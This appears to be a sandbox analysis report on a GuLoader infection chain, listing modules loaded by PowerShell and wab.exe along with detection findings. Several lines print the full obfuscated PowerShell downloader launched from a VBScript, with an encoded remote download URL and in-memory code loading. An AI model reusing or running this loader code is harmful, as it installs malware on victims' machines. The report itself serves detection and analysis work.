              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: CallSite.Targetore.pdbj source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: a`ystem.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.2027958959.0000016CA38B5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1959428838.0000000008919000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000008.00000002.1954692113.0000000007784000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2159560883.0000016CBDA15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2159560883.0000016CBD9F9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1954692113.00000000077D6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: anagement.Automation.pdb source: powershell.exe, 00000002.00000002.2155969999.0000016CBD76C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws\System.Core.pdbD source: powershell.exe, 00000002.00000002.2027958959.0000016CA38B5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbRT-P source: powershell.exe, 00000008.00000002.1954692113.0000000007811000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2159560883.0000016CBDA15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1954692113.0000000007775000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1954692113.0000000007784000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Tryklu", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000008.00000002.1960677789.000000000A947000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2662796523.0000000005827000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1960362593.0000000008BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1952620099.0000000005F08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2143669387.0000016CB53E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Anticipant)$global:Regitzes = [System.Text.Encoding]::ASCII.GetString($Bankkasserer)$global:fyrets=$Regitzes.substring($socialdemokratierne,$glossina)<#Antepirrhema misopfatte Briann
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((opholdsstues $Ejerinder $Teleplasmaens), (Afbanker @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Stripe = [AppDomain]::CurrentDomain.GetAssemblies()$glob
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Kephalins)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Irremission, $false).DefineType($Ternede, $Phyt
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Anticipant)$global:Regitzes = [System.Text.Encoding]::ASCII.GetString($Bankkasserer)$global:fyrets=$Regitzes.substring($socialdemokratierne,$glossina)<#Antepirrhema misopfatte Briann
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr ns
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Firtallene = 1;$Aspergilla='Su';$Aspergilla+='bstrin';$Aspergilla+='g';Function Jammerklagen($Trykluftsapparaterne){$Dialogkort223agttagen=$Trykluftsapparaterne.Length-$Firtallene;For($Dialogkort223=5;$Dialogkort223 -lt $Dialogkort223agttagen;$Dialogkort223+=6){$Nettofortjeneste+=$Trykluftsapparaterne.$Aspergilla.Invoke( $Dialogkort223, $Firtallene);}$Nettofortjeneste;}function Nassedes($Bibliografers){. ($Herskabshuset) ($Bibliografers);}$Kirkegange=Jammerklagen 'UltraM atioInd.pz Gasai Ropelafsenl Kon,aStrer/Omsor5Sickl.Alan,0P,raf Walle(HumilWT,ssui Reson .ragdIkke,oSimilwSkrigsStift SkrivNovervTUnor. Har 1Soupi0Beskn.Sekar0Kalve; Mult ,oogaWTierciD.kkenPers 6Hardw4Twal.;Do,im Tonefx Ener6 efri4Abeka;Caboo MerskrUndervEspr.:Finge1preju2Keyse1 Tena.Skaer0Clogg)Nonfo Extr,GPoly,e N.tucMonoskFrounoOhmm /Shor 2Tyr.n0Dott 1Exten0 oder0Lsbla1Wha.v0Ple e1 Spyt At amF Empli.rocerSvedtechirmfDamp.oTribuxBlind/I.aer1Concr2S,ent1Ives.. Selv0Brnea ';$Hydrosalt223=Jammerklagen 'AgronUGarvnsWurtzeUnecorFawni- N,nnA ClumgStepuefloc nLandbtPains ';$Chalybean=Jammerklagen ' Skynhconspt Fla,tEaglepFausssH smo:slutt/under/halv,w NutgwDefinwKat e. Kl bsZarzueLunksnkunstdDrencs EmbipAfgi.aEkspocDe aieHedvi.bankrcVeneroExaggmReint/GuttepLinierpreezo .nde/trylld Penul ,dan/Frig,p nig p OverxAfideoEfterdForfam Pens ';$Microgramming=Jammerklagen ' .ebu> fbr ';$Herskabshuset=Jammerklagen 'FormkiFornye Ti exBank, ';$Nikkelets='Cikorieekstrakters';Nassedes (Jammerklagen 'TilenSRumm eCevittsparr-OversCBuxtooForbinOve ttSubcleCamounCanedtOvere Cardi-Un loPPseudaPr tetForsth Plea .atefT Card:Ty,og\ AdredSer,iiProbam sin.eAchennVasessli uru ,ilamSand,.,upletBackoxFouritAlrun Hyst- TvejV Li.ea flu.lMikr uHypere Asso photo$ PortNTordei,ndavkUdda.kNonfee,ftallT iazeVag,btO.kresSkrab; Abel ');Nassedes (Jammerklagen '.rsteiTerriftetan Waist(Tecovt TesseEkseksForbltpiker-unharp RecaaCalort KashhNysen ,lfacTKombi:Mulci\Moruld,onyaiJubjum Erhve F.lgnKonsts LagnuTubipm Fru,.AlloktVennexMugglt bagf)Ander{,ickeeMeadwx Non.iDisiltPrec }Viren;Tppe, ');$Unsolidifiable = Jammerklagen 'Fluttekar ocWarplhCharmoKoler pocy%AeoniaVogtep VarepSubindBumseaExcomtLae,ea ,erl%catar\ AgamBFaglolTyre,aSlutsnAmninkSp.erofluor. unmoPMariorChannoPhleb Misbe&Julet&sknhe Om,rbe,eisecF.rskhRe.itoBili. A,ce$finko ';Nassedes (Jammerklagen 'Veili$St legDyreblPa,mao ExtrbBestoa telil laa:WhirlLRaabaoSinisr semid SkylskoghewUndstiThickk ookeeB and=,rich(RecascenthumFi tsd gglu Genet/L,mpicUnder Under$PersoUTran,nRedefsFjernoUlderlSchiliU,stedUforniD urofasteristarta Lathb Dupel V,ate Pe,f)Diala ');Nassedes (Jammerklagen 'Fletn$ TerrgBe,zalRed,voMyndeb Att a In.ul Baga: BansMrenovaPastaaPaxilljockee nderrOver.uKontadG rtnsAntiet Ana.yKri.tr Spyt=Fl es$ BndsCStammhChartaSystelOrleayForvrbF leseLystoaCarvynMaxim.OmkrysArc iphipmolbu,eaimacultF ded(Yderk$ExtolMTintyiExtracKerstrTr nsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1D00BD pushad ; iretd 2_2_00007FFB4B1D00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B1D0942 push E95B38D0h; ret 2_2_00007FFB4B1D09C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFB4B2A71C8 push esp; retf 2_2_00007FFB4B2A71C9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04BE8F68 push ss; ret 8_2_04BE8F72
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04BE1CFB pushad ; ret 8_2_04BE1D0A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04BE1C6B pushad ; ret 8_2_04BE1CEA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04BE7DE0 pushfd ; retf 8_2_04BE7DF1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04BE1D0B pushad ; ret 8_2_04BE1D1A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07860638 push eax; mov dword ptr [esp], ecx8_2_07860AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07860AB8 push eax; mov dword ptr [esp], ecx8_2_07860AC4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_2255A153 push 00000022h; ret 11_2_2255A166
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_2255A170 push 00000022h; ret 11_2_2255A186
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_2255A110 push 00000022h; ret 11_2_2255A126
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_2255A130 push 00000022h; ret 11_2_2255A146
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24F64CAF push esp; ret 11_2_24F64CC2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24F62FB0 push es; ret 11_2_24F63B36
